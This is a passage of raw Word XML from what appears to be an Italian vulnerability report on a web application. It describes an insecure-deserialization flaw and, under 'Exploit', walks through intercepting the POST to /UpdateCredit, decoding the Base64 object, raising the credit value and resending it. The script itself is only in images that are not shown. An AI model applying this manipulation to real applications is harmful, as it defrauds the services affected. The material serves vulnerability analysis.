        <w:t>Dato che il credito e l’ID dell’utente vengono inviati serializzati al backend, u</w:t>
      </w:r>
      <w:r w:rsidR="00E464AA">
        <w:t xml:space="preserve">n utente </w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t xml:space="preserve">malevolo </w:t>
      </w:r>
      <w:r w:rsidR="00E464AA">
        <w:t xml:space="preserve">potrebbe </w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t xml:space="preserve">sfruttare la vulnerabilità per </w:t>
      </w:r>
      <w:r w:rsidR="00E464AA">
        <w:t>incrementare il proprio credito</w:t>
      </w:r>
      <w:r w:rsidR="001935CC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E464AA">
        <w:t>sfruttando la serializzazione con cui l’oggetto viene inviato al backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E64E1" w14:textId="10FD86A6" w:rsidR="00EF10FE" w:rsidRDefault="00A62E0F" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251982848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A75F0F4" wp14:editId="69234347">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>61595</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3744595" cy="4624108"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="1318114754"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4595" cy="4624108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63132431" w14:textId="201EAF9C" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251853824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1380D2D1" wp14:editId="507EF1D6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1259840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4530090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3596640" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1525020375" name="Casella di tes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01F0F9D" w14:textId="6D485460"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>53</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: AccountUs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D2D1" id="_x0000_s1080" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:99.2pt;margin-top:356.7pt;width:283.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QnGw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59mszsKSYrNbq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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="001F0F9D" w14:textId="6D485460"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>53</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: AccountUser.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAC7019" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2196037E" w14:textId="50DD82D1" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043C4771" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CA0715" w14:textId="7CA26DAF" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10DE02ED" w14:textId="44620446" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4971D0DD" w14:textId="7FD3E8B1" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A32CBA" w14:textId="0657E7B1" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D8A6ABF" w14:textId="541EB4BE" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FEAE2AB" w14:textId="0A796F0E" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26DC99DE" w14:textId="3F9A3173" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59809F76" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5E92F0" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B48C5F" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DE8E3E" w14:textId="7EC59DB7" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="482340B9" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6629E072" w14:textId="7DA3D823" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C124FD9" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D2BEF3" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED4FDB1" w14:textId="1EA77331" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F12CC0" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFC20D3" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAE5006" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49198815" w14:textId="328D0D51" w:rsidR="001935CC" w:rsidRDefault="00A62E0F" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251983872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48FDC3B1" wp14:editId="68449EE3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-571500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6713220" cy="2601009"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapNone/>
            <wp:docPr id="73656675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3220" cy="2601009"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DD0584" w14:textId="72E6C0A7" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC74E37" w14:textId="3DB260C6" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558E14BC" w14:textId="2CB746BB" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2BE702" w14:textId="3AA0840C" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E49821" w14:textId="70EF9752" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E94B2D" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A508082" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5C999B" w14:textId="77777777" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E59E754" w14:textId="0A1CD5EB" w:rsidR="001935CC" w:rsidRDefault="0077061B" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251857920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BB74E24" wp14:editId="0F474003">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>189865</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6586855" cy="635"/>
                <wp:effectExtent l="0" t="0" r="4445" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="284442662" name="Casella di testo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1F1ACA7" w14:textId="6FF80E85"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4</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E24" id="_x0000_s1081" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:14.95pt;width:518.6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XsGwIAAEA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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="61F1ACA7" w14:textId="6FF80E85"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4</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="309806EA" w14:textId="77777777" w:rsidR="00081BA5" w:rsidRDefault="00081BA5" w:rsidP="00081BA5"/>
    <w:p w14:paraId="12045C0A" w14:textId="50B15DA4" w:rsidR="001935CC" w:rsidRPr="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001935CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C2042" w14:textId="1CC88D3C" w:rsidR="00081BA5" w:rsidRDefault="00081BA5" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inizialmente bisogna autenticarsi tramite un utente valido, andare nella sezione account per vedere le informazioni relative ad esso ed aprire da qui il web developer tool del browser, andando nella sezione network per intercettare la POST ad </w:t>
      </w:r>
      <w:r w:rsidRPr="00F5273B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/UpdateCredit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> come in Figura 5</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>. Come si può notare, il payload contiene l’oggetto serializzato quindi bisogna deserializzarlo con un decoder Base64 per tradurre l’oggetto inviato, così da modificare i campi di interesse per l’attaccante e serializzare nuovamente l’oggetto da inviare (Figura5</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBFF9FB" w14:textId="55A46787" w:rsidR="001935CC" w:rsidRDefault="00081BA5" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Per l’exploit è stato creato uno script Javascript che permette di serializzare un oggetto contente l’userID e il campo credit, come mostrato in Figura 5</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Fatto ciò, l’oggetto serializzato può essere sostituito a quello precedente </w:t>
      </w:r>
      <w:r w:rsidR="0077061B">
        <w:t xml:space="preserve">e inviato </w:t>
      </w:r>
      <w:r>
        <w:t>usando Edit e Resend, modficando la POST a /UpdateCredit</w:t>
      </w:r>
      <w:r w:rsidR="0077061B">
        <w:t xml:space="preserve"> (Figura 5</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="0077061B">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7693FFBF" w14:textId="5545948F" w:rsidR="001935CC" w:rsidRDefault="00081BA5" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251860992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69610664" wp14:editId="2550A20C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-407035</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2317115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6929120" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2115256166" name="Casella di testo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88ED30D" w14:textId="73CB11F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5</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Schermata browser con oggett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0664" id="_x0000_s1082" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-32.05pt;margin-top:182.45pt;width:545.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bGgIAAEA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ntbE4hSbHFx5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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="288ED30D" w14:textId="73CB11F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5</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata browser con oggetto serializzato</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251858944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EA8D543" wp14:editId="23D5DD35">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>164465</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6929120" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="124507129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29120" cy="2095500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4494B523" w14:textId="2ED144D8" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F263D0F" w14:textId="0AF0E413" w:rsidR="001935CC" w:rsidRDefault="001935CC" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A16D00B" w14:textId="630C72AF" w:rsidR="00E464AA" w:rsidRPr="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00E464AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310DDC13" w14:textId="31065A07" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2734F518" w14:textId="7F450B0B" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0B6C1E6C" w14:textId="7035B5E7" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="68D19015" w14:textId="202EB05F" w:rsidR="0031586D" w:rsidRDefault="0031586D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7D155534" w14:textId="74F49CD2" w:rsidR="00EF10FE" w:rsidRDefault="00EF10FE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1101C9EF" w14:textId="7E391A3C" w:rsidR="00D03FA6" w:rsidRDefault="0077061B" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34FFA6A5" wp14:editId="3EC1AC65">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>138430</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A5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251863040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75B3398B" wp14:editId="5C61B4EE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1136015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1757680</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3841115" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="389992643" name="Casella di testo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A857857" w14:textId="376F8376"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6</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Script per serializzare gli ogg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398B" id="_x0000_s1083" type="#_x0000_t202" style="position:absolute;margin-left:89.45pt;margin-top:138.4pt;width:30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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2A857857" w14:textId="376F8376"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6</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Script per serializzare gli oggetti</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AE8E8A" w14:textId="1D8FEFC3" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="570CDDE9" w14:textId="6E677B7C" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="75EF79BB" w14:textId="5B59866F" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="38080FC7" w14:textId="2BF6F686" w:rsidR="00E464AA" w:rsidRDefault="00081BA5" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251865088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C5C4EC4" wp14:editId="1C718781">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>883285</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>671830</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4352925" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="741524839" name="Casella di tes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47631E7" w14:textId="0D018CAF"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7</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Oggetto malevol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4EC4" id="_x0000_s1084" type="#_x0000_t202" style="position:absolute;margin-left:69.55pt;margin-top:52.9pt;width:342.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="547631E7" w14:textId="0D018CAF"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7</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Oggetto malevolo serializzato</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B04ACC0" wp14:editId="333159F1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-426085</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534D" w14:textId="4E297600" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="38E3AB52" w14:textId="78DCC3F4" w:rsidR="00E464AA" w:rsidRDefault="00E464AA" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0364E413" w14:textId="587D1875" w:rsidR="00E464AA" w:rsidRDefault="0077061B" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3673F93C" wp14:editId="01B2F22A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>84455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4740275" cy="3762655"/>
            <wp:effectExtent l="0" t="0" r="3175" b="9525"/>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b="8736"/>
